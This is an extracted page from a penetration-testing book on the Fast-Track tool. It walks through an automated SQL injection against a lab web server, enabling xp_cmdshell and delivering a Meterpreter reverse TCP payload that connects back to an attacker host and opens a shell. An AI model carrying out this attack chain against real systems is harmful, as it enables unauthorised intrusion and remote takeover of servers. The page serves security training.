background image

Fast-Track

173

Spidering is complete.

*************************************************************************
http://10.211.55.128
*************************************************************************

[+] Number of forms detected: 2 [+]

 A SQL Exception has been encountered in the "txtLogin" input field of the 

above website.

Depending on whether the website presents an error when SQL injec-

tion attempts are made, you will need to choose between 

BLIND

 and 

ERROR 

BASED 

attacks. At   we choose 

ERROR BASED

 because the site is kind enough 

to report back error messages when it has trouble executing a SQL query.

Next, choose either to spider a single URL or to scan a complete subnet  . 

After scanning the subnet, we choose to attack all the sites Fast-Track found  . 
As you can see, scanning all the sites found a vulnerable form   on one site.

The final configuration steps require that you select a payload. In the 

following example, you select 

Metasploit Meterpreter Reflective Reverse TCP

 

 along with the port at   that you want your attacking machine to listen 

on. After Fast-Track has successfully exploited the SQL injection vulnerabil-
ity, it sends a chunked payload   to the target and eventually presents you 
with your Meterpreter shell  .

What type of payload do you want?

1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)
5. Metasploit Meterpreter Reflective Reverse TCP
6. Metasploit Reflective Reverse VNC

 Select your choice: 

5

 Enter the port you want to listen on: 

9090

[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Created by msfpayload (http://www.metasploit.com).
Payload: windows/patchupmeterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Taking raw binary and converting to hex.
Raw binary converted to straight hex.

 [+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]